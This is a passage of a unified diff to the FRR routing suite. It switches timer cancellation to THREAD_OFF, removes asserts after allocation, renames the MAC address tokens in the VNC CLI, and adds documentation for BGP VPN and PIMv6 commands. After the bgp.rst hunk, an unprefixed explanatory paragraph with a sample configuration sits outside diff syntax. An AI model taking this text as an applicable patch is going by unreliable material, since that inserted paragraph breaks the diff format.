- struct rfapi_rib_tcb *tcb = t->arg;
+ struct rfapi_rib_tcb *tcb = THREAD_ARG(t);
RFAPI_RIB_CHECK_COUNTS(1, 0);
@@ -338,8 +338,8 @@ static void rfapiRibStartTimer(struct rfapi_descriptor *rfd,
struct rfapi_rib_tcb *tcb = NULL;
if (ri->timer) {
- tcb = ri->timer->arg;
- thread_cancel(&ri->timer);
+ tcb = THREAD_ARG(ri->timer);
+ THREAD_OFF(ri->timer);
} else {
tcb = XCALLOC(MTYPE_RFAPI_RECENT_DELETE,
sizeof(struct rfapi_rib_tcb));
@@ -357,10 +357,9 @@ static void rfapiRibStartTimer(struct rfapi_descriptor *rfd,
vnc_zlog_debug_verbose("%s: rfd %p pfx %pRN life %u", __func__, rfd, rn,
ri->lifetime);
- ri->timer = NULL;
+
thread_add_timer(bm->master, rfapiRibExpireTimer, tcb, ri->lifetime,
&ri->timer);
- assert(ri->timer);
}
extern void rfapi_rib_key_init(struct prefix *prefix, /* may be NULL */
@@ -914,8 +913,8 @@ static void process_pending_node(struct bgp *bgp, struct rfapi_descriptor *rfd,
if (ri->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = ri->timer->arg;
- thread_cancel(&ri->timer);
+ tcb = THREAD_ARG(ri->timer);
+ THREAD_OFF(ri->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
@@ -999,8 +998,8 @@ static void process_pending_node(struct bgp *bgp, struct rfapi_descriptor *rfd,
if (ori->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = ori->timer->arg;
- thread_cancel(&ori->timer);
+ tcb = THREAD_ARG(ori->timer);
+ THREAD_OFF(ori->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
@@ -1179,7 +1178,6 @@ callback:
new = XCALLOC(MTYPE_RFAPI_NEXTHOP,
sizeof(struct rfapi_next_hop_entry));
- assert(new);
if (ri->rk.aux_prefix.family) {
rfapiQprefix2Rprefix(&ri->rk.aux_prefix,
@@ -1269,7 +1267,6 @@ callback:
new = XCALLOC(
MTYPE_RFAPI_NEXTHOP,
sizeof(struct rfapi_next_hop_entry));
- assert(new);
if (ri->rk.aux_prefix.family) {
rfapiQprefix2Rprefix(&ri->rk.aux_prefix,
@@ -1345,8 +1342,8 @@ callback:
if (ri->timer) {
struct rfapi_rib_tcb *tcb;
- tcb = ri->timer->arg;
- thread_cancel(&ri->timer);
+ tcb = THREAD_ARG(ri->timer);
+ THREAD_OFF(ri->timer);
XFREE(MTYPE_RFAPI_RECENT_DELETE, tcb);
}
RFAPI_RIB_CHECK_COUNTS(0, delete_list->count);
@@ -1718,7 +1715,6 @@ void rfapiRibUpdatePendingNode(
urq = XCALLOC(MTYPE_RFAPI_UPDATED_RESPONSE_QUEUE,
sizeof(struct rfapi_updated_responses_queue));
- assert(urq);
if (!rfd->updated_responses_queue)
updated_responses_queue_init(rfd);
diff --git a/bgpd/rfapi/rfapi_vty.c b/bgpd/rfapi/rfapi_vty.c
index b95bace0d1..c8fdadcac9 100644
--- a/bgpd/rfapi/rfapi_vty.c
+++ b/bgpd/rfapi/rfapi_vty.c
@@ -928,12 +928,9 @@ int rfapiShowVncQueries(void *stream, struct prefix *pfx_match)
} else
fp(out, "%-15s %-15s", "", "");
buf_remain[0] = 0;
- if (m->timer) {
- rfapiFormatSeconds(
- thread_timer_remain_second(
- m->timer),
- buf_remain, BUFSIZ);
- }
+ rfapiFormatSeconds(
+ thread_timer_remain_second(m->timer),
+ buf_remain, BUFSIZ);
fp(out, " %-15s %-10s\n",
inet_ntop(m->p.family, &m->p.u.prefix,
buf_pfx, BUFSIZ),
@@ -1005,12 +1002,9 @@ int rfapiShowVncQueries(void *stream, struct prefix *pfx_match)
} else
fp(out, "%-15s %-15s", "", "");
buf_remain[0] = 0;
- if (mon_eth->timer) {
- rfapiFormatSeconds(
- thread_timer_remain_second(
- mon_eth->timer),
- buf_remain, BUFSIZ);
- }
+ rfapiFormatSeconds(thread_timer_remain_second(
+ mon_eth->timer),
+ buf_remain, BUFSIZ);
fp(out, " %-17s %10d %-10s\n",
rfapi_ntop(pfx_mac.family, &pfx_mac.u.prefix,
buf_pfx, BUFSIZ),
@@ -2515,7 +2509,7 @@ DEFUN (add_vnc_prefix,
************************************************************************/
DEFUN (add_vnc_mac_vni_prefix_cost_life,
add_vnc_mac_vni_prefix_cost_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255) lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255) lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2545,7 +2539,7 @@ DEFUN (add_vnc_mac_vni_prefix_cost_life,
DEFUN (add_vnc_mac_vni_prefix_life,
add_vnc_mac_vni_prefix_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2572,7 +2566,7 @@ DEFUN (add_vnc_mac_vni_prefix_life,
DEFUN (add_vnc_mac_vni_prefix_cost,
add_vnc_mac_vni_prefix_cost_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M> cost (0-255)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2598,7 +2592,7 @@ DEFUN (add_vnc_mac_vni_prefix_cost,
DEFUN (add_vnc_mac_vni_prefix,
add_vnc_mac_vni_prefix_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M>",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> prefix <A.B.C.D/M|X:X::X:X/M>",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2622,7 +2616,7 @@ DEFUN (add_vnc_mac_vni_prefix,
DEFUN (add_vnc_mac_vni_cost_life,
add_vnc_mac_vni_cost_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255) lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255) lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2649,7 +2643,7 @@ DEFUN (add_vnc_mac_vni_cost_life,
DEFUN (add_vnc_mac_vni_cost,
add_vnc_mac_vni_cost_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> cost (0-255)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2673,7 +2667,7 @@ DEFUN (add_vnc_mac_vni_cost,
DEFUN (add_vnc_mac_vni_life,
add_vnc_mac_vni_life_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lifetime (1-4294967295)",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X> lifetime (1-4294967295)",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -2698,7 +2692,7 @@ DEFUN (add_vnc_mac_vni_life,
DEFUN (add_vnc_mac_vni,
add_vnc_mac_vni_cmd,
- "add vnc mac YY:YY:YY:YY:YY:YY virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X>",
+ "add vnc mac X:X:X:X:X:X virtual-network-identifier (1-4294967295) vn <A.B.C.D|X:X::X:X> un <A.B.C.D|X:X::X:X>",
"Add registration\n"
"VNC Information\n"
"Add/modify mac address information\n"
@@ -3749,7 +3743,7 @@ DEFUN (clear_vnc_prefix_all,
*/
DEFUN (clear_vnc_mac_vn_un,
clear_vnc_mac_vn_un_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3782,7 +3776,7 @@ DEFUN (clear_vnc_mac_vn_un,
DEFUN (clear_vnc_mac_un_vn,
clear_vnc_mac_un_vn_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3815,7 +3809,7 @@ DEFUN (clear_vnc_mac_un_vn,
DEFUN (clear_vnc_mac_un,
clear_vnc_mac_un_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3844,7 +3838,7 @@ DEFUN (clear_vnc_mac_un,
DEFUN (clear_vnc_mac_vn,
clear_vnc_mac_vn_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3873,7 +3867,7 @@ DEFUN (clear_vnc_mac_vn,
DEFUN (clear_vnc_mac_all,
clear_vnc_mac_all_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> *",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> *",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3903,7 +3897,7 @@ DEFUN (clear_vnc_mac_all,
DEFUN (clear_vnc_mac_vn_un_prefix,
clear_vnc_mac_vn_un_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3940,7 +3934,7 @@ DEFUN (clear_vnc_mac_vn_un_prefix,
DEFUN (clear_vnc_mac_un_vn_prefix,
clear_vnc_mac_un_vn_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -3981,7 +3975,7 @@ DEFUN (clear_vnc_mac_un_vn_prefix,
DEFUN (clear_vnc_mac_un_prefix,
clear_vnc_mac_un_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> un <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -4014,7 +4008,7 @@ DEFUN (clear_vnc_mac_un_prefix,
DEFUN (clear_vnc_mac_vn_prefix,
clear_vnc_mac_vn_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> vn <*|A.B.C.D|X:X::X:X> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -4047,7 +4041,7 @@ DEFUN (clear_vnc_mac_vn_prefix,
DEFUN (clear_vnc_mac_all_prefix,
clear_vnc_mac_all_prefix_cmd,
- "clear vnc mac <*|YY:YY:YY:YY:YY:YY> virtual-network-identifier <*|(1-4294967295)> prefix <*|A.B.C.D/M|X:X::X:X/M>",
+ "clear vnc mac <*|X:X:X:X:X:X> virtual-network-identifier <*|(1-4294967295)> prefix <*|A.B.C.D/M|X:X::X:X/M>",
"clear\n"
"VNC Information\n"
"Clear mac registration information\n"
@@ -4395,13 +4389,15 @@ static void rfapi_show_registrations(struct vty *vty,
DEFUN (vnc_show_registrations_pfx,
vnc_show_registrations_pfx_cmd,
- "show vnc registrations [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc registrations [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List active prefix registrations\n"
+	       "Limit output to a particular IPv4 address\n"
"Limit output to a particular IPv4 prefix\n"
+	       "Limit output to a particular IPv6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particular IPv6 address\n")
+ "Limit output to a particular MAC address\n")
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4421,7 +4417,7 @@ DEFUN (vnc_show_registrations_pfx,
DEFUN (vnc_show_registrations_some_pfx,
vnc_show_registrations_some_pfx_cmd,
- "show vnc registrations <all|holddown|imported|local|remote> [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc registrations <all|holddown|imported|local|remote> [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List active prefix registrations\n"
@@ -4430,9 +4426,11 @@ DEFUN (vnc_show_registrations_some_pfx,
"show only imported prefixes\n"
"show only local registrations\n"
"show only remote registrations\n"
- "Limit output to a particular prefix or address\n"
- "Limit output to a particular prefix or address\n"
- "Limit output to a particular prefix or address\n")
+	       "Limit output to a particular IPv4 address\n"
+ "Limit output to a particular IPv4 prefix\n"
+	       "Limit output to a particular IPv6 address\n"
+ "Limit output to a particular IPv6 prefix\n"
+ "Limit output to a particular MAC address\n")
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4482,13 +4480,15 @@ DEFUN (vnc_show_registrations_some_pfx,
DEFUN (vnc_show_responses_pfx,
vnc_show_responses_pfx_cmd,
- "show vnc responses [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc responses [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List recent query responses\n"
+	       "Limit output to a particular IPv4 address\n"
"Limit output to a particular IPv4 prefix\n"
+	       "Limit output to a particular IPv6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particular IPv6 address\n" )
+ "Limit output to a particular MAC address\n" )
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4513,15 +4513,17 @@ DEFUN (vnc_show_responses_pfx,
DEFUN (vnc_show_responses_some_pfx,
vnc_show_responses_some_pfx_cmd,
- "show vnc responses <active|removed> [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc responses <active|removed> [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List recent query responses\n"
"show only active query responses\n"
"show only removed query responses\n"
+	       "Limit output to a particular IPv4 address\n"
"Limit output to a particular IPv4 prefix\n"
+	       "Limit output to a particular IPv6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particular IPV6 address\n")
+ "Limit output to a particular MAC address\n")
{
struct prefix p;
struct prefix *p_addr = NULL;
@@ -4565,13 +4567,15 @@ DEFUN (vnc_show_responses_some_pfx,
DEFUN (show_vnc_queries_pfx,
show_vnc_queries_pfx_cmd,
- "show vnc queries [<A.B.C.D/M|X:X::X:X/M|YY:YY:YY:YY:YY:YY>]",
+ "show vnc queries [<A.B.C.D|A.B.C.D/M|X:X::X:X|X:X::X:X/M|X:X:X:X:X:X>]",
SHOW_STR
VNC_SHOW_STR
"List active queries\n"
- "Limit output to a particular IPv4 prefix or address\n"
+	       "Limit output to a particular IPv4 address\n"
+ "Limit output to a particular IPv4 prefix\n"
+	       "Limit output to a particular IPv6 address\n"
"Limit output to a particular IPv6 prefix\n"
- "Limit output to a particualr IPV6 address\n")
+	       "Limit output to a particular MAC address\n")
{
struct prefix pfx;
struct prefix *p = NULL;
diff --git a/bgpd/rfapi/vnc_export_bgp.c b/bgpd/rfapi/vnc_export_bgp.c
index 7cfa2ed67d..05e45bc4c8 100644
--- a/bgpd/rfapi/vnc_export_bgp.c
+++ b/bgpd/rfapi/vnc_export_bgp.c
@@ -564,7 +564,6 @@ static struct ecommunity *vnc_route_origin_ecom_single(struct in_addr *origin)
roec.val[7] = 0;
new = ecommunity_new();
- assert(new);
ecommunity_add_val(new, &roec, false, false);
if (!new->size) {
@@ -1713,7 +1712,7 @@ void vnc_direct_bgp_rh_add_route(struct bgp *bgp, afi_t afi,
* export expiration timer is already running on
* this route: cancel it
*/
- thread_cancel(&eti->timer);
+ THREAD_OFF(eti->timer);
bgp_update(peer, prefix, /* prefix */
0, /* addpath_id */
@@ -1727,7 +1726,7 @@ void vnc_direct_bgp_rh_add_route(struct bgp *bgp, afi_t afi,
static void vncExportWithdrawTimer(struct thread *t)
{
- struct vnc_export_info *eti = t->arg;
+ struct vnc_export_info *eti = THREAD_ARG(t);
const struct prefix *p = agg_node_get_prefix(eti->node);
/*
@@ -1944,7 +1943,7 @@ void vnc_direct_bgp_rh_vpn_enable(struct bgp *bgp, afi_t afi)
* already running on
* this route: cancel it
*/
- thread_cancel(&eti->timer);
+ THREAD_OFF(eti->timer);
vnc_zlog_debug_verbose(
"%s: calling bgp_update",
@@ -2013,7 +2012,7 @@ void vnc_direct_bgp_rh_vpn_disable(struct bgp *bgp, afi_t afi)
ZEBRA_ROUTE_VNC_DIRECT_RH,
BGP_ROUTE_REDISTRIBUTE);
if (eti) {
- thread_cancel(&eti->timer);
+ THREAD_OFF(eti->timer);
vnc_eti_delete(eti);
}
diff --git a/bgpd/rfapi/vnc_export_table.c b/bgpd/rfapi/vnc_export_table.c
index 255f868bdf..743576d265 100644
--- a/bgpd/rfapi/vnc_export_table.c
+++ b/bgpd/rfapi/vnc_export_table.c
@@ -119,7 +119,6 @@ struct vnc_export_info *vnc_eti_get(struct bgp *bgp, vnc_export_type_t etype,
agg_unlock_node(etn);
} else {
eti = XCALLOC(MTYPE_RFAPI_ETI, sizeof(struct vnc_export_info));
- assert(eti);
eti->node = etn;
eti->peer = peer;
peer_lock(peer);
diff --git a/bgpd/rfapi/vnc_zebra.c b/bgpd/rfapi/vnc_zebra.c
index 293f88d1df..fe818987b8 100644
--- a/bgpd/rfapi/vnc_zebra.c
+++ b/bgpd/rfapi/vnc_zebra.c
@@ -193,7 +193,7 @@ static void vnc_redistribute_add(struct prefix *p, uint32_t metric,
* is not strictly necessary, but serves as a reminder
* to those who may meddle...
*/
- frr_with_mutex(&vncHD1VR.peer->io_mtx) {
+ frr_with_mutex (&vncHD1VR.peer->io_mtx) {
// we don't need any I/O related facilities
if (vncHD1VR.peer->ibuf)
stream_fifo_free(vncHD1VR.peer->ibuf);
diff --git a/debian/changelog b/debian/changelog
index feaf92d073..9c14270b66 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,10 +1,16 @@
frr (8.4~dev-1) UNRELEASED; urgency=medium
- * New upstream release...
+ * FRR Dev 8.4
- -- Donatas Abraitis <donatas@opensourcerouting.org> Tue, 07 May 2022 23:00:00 +0300
+ -- Jafar Al-Gharaibeh <jafar@atcorp.com> Wed, 20 Jul 2022 10:00:00 +0500
-frr (8.2-0) UNRELEASED; urgency=medium
+frr (8.3-0) unstable; urgency=medium
+
+ * New upstream release FRR 8.3
+
+ -- Jafar Al-Gharaibeh <jafar@atcorp.com> Wed, 13 Jul 2022 10:00:00 +0500
+
+frr (8.2-0) unstable; urgency=medium
* New upstream release FRR 8.2
diff --git a/doc/developer/locking.rst b/doc/developer/locking.rst
index c8366480d2..bce1311188 100644
--- a/doc/developer/locking.rst
+++ b/doc/developer/locking.rst
@@ -7,7 +7,7 @@ FRR ships two small wrappers around ``pthread_mutex_lock()`` /
``pthread_mutex_unlock``. Use ``#include "frr_pthread.h"`` to get these
macros.
-.. c:macro:: frr_with_mutex(mutex)
+.. c:macro:: frr_with_mutex (mutex)
(With ``pthread_mutex_t *mutex``.)
@@ -17,7 +17,7 @@ macros.
int somefunction(int option)
{
- frr_with_mutex(&my_mutex) {
+ frr_with_mutex (&my_mutex) {
/* mutex will be locked */
if (!option)
diff --git a/doc/developer/rcu.rst b/doc/developer/rcu.rst
index c8248194b7..ac4405121e 100644
--- a/doc/developer/rcu.rst
+++ b/doc/developer/rcu.rst
@@ -13,7 +13,7 @@ operation (and not a set of APIs.) The core ideas are:
"invisible" copies. Other threads, when they access the structure, see an
older (but consistent) copy.
-* once done, the updated copy is swapped in in a single operation so that
+* once done, the updated copy is swapped in a single operation so that
other threads see either the old or the new data but no inconsistent state
between.
diff --git a/doc/developer/topotests.rst b/doc/developer/topotests.rst
index 6c1d9148d1..ada182d847 100644
--- a/doc/developer/topotests.rst
+++ b/doc/developer/topotests.rst
@@ -38,6 +38,12 @@ Installing Topotest Requirements
# To enable the gRPC topotest install:
python3 -m pip install grpcio grpcio-tools
+ # Install the socat tool in order to run the PIMv6 tests.
+ # The socat code can be taken from the URL below, which
+ # has the latest changes needed for PIMv6 join and
+ # traffic testing:
+ https://github.com/opensourcerouting/socat/
+
Enable Coredumps
""""""""""""""""
diff --git a/doc/user/bgp.rst b/doc/user/bgp.rst
index 28f59f205f..daaf80ae07 100644
--- a/doc/user/bgp.rst
+++ b/doc/user/bgp.rst
@@ -2827,6 +2827,14 @@ address-family:
The CLI will disallow attempts to configure incompatible leaking
modes.
+.. clicmd:: bgp retain route-target all
+
+This command controls whether VPN prefixes that are not imported by any
+local VRF configuration are retained. It applies in the context of the
+global VPNv4/VPNv6 address-family. The default is on, in which case the
+command is not displayed in the configuration; only the
+`no bgp retain route-target all` form of the command is displayed.
+
.. _bgp-l3vpn-srv6:
L3VPN SRv6
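As a hedged illustration of where the new knob sits (the ASN is a placeholder and the exact placement follows common FRR configuration style, not text from this patch):

    router bgp 65001
     address-family ipv4 vpn
      no bgp retain route-target all
     exit-address-family

With the default (retain all route targets) in effect, nothing is shown in the running configuration; only the `no` form above appears.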
diff --git a/doc/user/pimv6.rst b/doc/user/pimv6.rst
index 9bbd6abd80..bda9eaec80 100644
--- a/doc/user/pimv6.rst
+++ b/doc/user/pimv6.rst
@@ -385,6 +385,10 @@ Clear commands reset various variables.
packet count, byte count and wrong interface to 0 and start count
up from this spot.
+.. clicmd:: clear ipv6 pim interfaces
+
+ Reset PIMv6 interfaces.
+
.. clicmd:: clear ipv6 pim oil
Rescan PIMv6 OIL (output interface list).
diff --git a/isisd/fabricd.c b/isisd/fabricd.c
index d431787ebb..a37cda1ce1 100644
--- a/isisd/fabricd.c
+++ b/isisd/fabricd.c
@@ -238,11 +238,11 @@ struct fabricd *fabricd_new(struct isis_area *area)
void fabricd_finish(struct fabricd *f)
{
- thread_cancel(&(f->initial_sync_timeout));
+ THREAD_OFF(f->initial_sync_timeout);
- thread_cancel(&(f->tier_calculation_timer));
+ THREAD_OFF(f->tier_calculation_timer);
- thread_cancel(&(f->tier_set_timer));
+ THREAD_OFF(f->tier_set_timer);
isis_spftree_del(f->spftree);
neighbor_lists_clear(f);
@@ -334,7 +334,7 @@ void fabricd_initial_sync_finish(struct isis_area *area)
f->initial_sync_circuit->interface->name);
f->initial_sync_state = FABRICD_SYNC_COMPLETE;
f->initial_sync_circuit = NULL;
- thread_cancel(&(f->initial_sync_timeout));
+ THREAD_OFF(f->initial_sync_timeout);
}
static void fabricd_bump_tier_calculation_timer(struct fabricd *f);
@@ -427,14 +427,14 @@ static void fabricd_bump_tier_calculation_timer(struct fabricd *f)
{
/* Cancel timer if we already know our tier */
if (f->tier != ISIS_TIER_UNDEFINED || f->tier_set_timer) {
- thread_cancel(&(f->tier_calculation_timer));
+ THREAD_OFF(f->tier_calculation_timer);
return;
}
/* If we need to calculate the tier, wait some
* time for the topology to settle before running
* the calculation */
- thread_cancel(&(f->tier_calculation_timer));
+ THREAD_OFF(f->tier_calculation_timer);
thread_add_timer(master, fabricd_tier_calculation_cb, f,
2 * f->area->lsp_gen_interval[ISIS_LEVEL2 - 1],
@@ -719,7 +719,7 @@ void fabricd_trigger_csnp(struct isis_area *area, bool circuit_scoped)
if (!circuit->t_send_csnp[1])
continue;
- thread_cancel(&(circuit->t_send_csnp[ISIS_LEVEL2 - 1]));
+ THREAD_OFF(circuit->t_send_csnp[ISIS_LEVEL2 - 1]);
thread_add_timer_msec(master, send_l2_csnp, circuit,
isis_jitter(f->csnp_delay, CSNP_JITTER),
&circuit->t_send_csnp[ISIS_LEVEL2 - 1]);
diff --git a/isisd/isis_adjacency.c b/isisd/isis_adjacency.c
index 11f17ec7bf..86cf10ae17 100644
--- a/isisd/isis_adjacency.c
+++ b/isisd/isis_adjacency.c
@@ -161,7 +161,7 @@ void isis_delete_adj(void *arg)
/* Remove self from snmp list without walking the list*/
list_delete_node(adj->circuit->snmp_adj_list, adj->snmp_list_node);
- thread_cancel(&adj->t_expire);
+ THREAD_OFF(adj->t_expire);
if (adj->adj_state != ISIS_ADJ_DOWN)
adj->adj_state = ISIS_ADJ_DOWN;
@@ -170,7 +170,7 @@ void isis_delete_adj(void *arg)
XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->area_addresses);
XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->ipv4_addresses);
XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->ll_ipv6_addrs);
-
+ XFREE(MTYPE_ISIS_ADJACENCY_INFO, adj->global_ipv6_addrs);
adj_mt_finish(adj);
list_delete(&adj->adj_sids);
diff --git a/isisd/isis_circuit.c b/isisd/isis_circuit.c
index 28d4b530fc..9e97e48937 100644
--- a/isisd/isis_circuit.c
+++ b/isisd/isis_circuit.c
@@ -845,12 +845,12 @@ void isis_circuit_down(struct isis_circuit *circuit)
memset(circuit->u.bc.l2_desig_is, 0, ISIS_SYS_ID_LEN + 1);
memset(circuit->u.bc.snpa, 0, ETH_ALEN);
- thread_cancel(&circuit->u.bc.t_send_lan_hello[0]);
- thread_cancel(&circuit->u.bc.t_send_lan_hello[1]);
- thread_cancel(&circuit->u.bc.t_run_dr[0]);
- thread_cancel(&circuit->u.bc.t_run_dr[1]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[0]);
- thread_cancel(&circuit->u.bc.t_refresh_pseudo_lsp[1]);
+ THREAD_OFF(circuit->u.bc.t_send_lan_hello[0]);
+ THREAD_OFF(circuit->u.bc.t_send_lan_hello[1]);
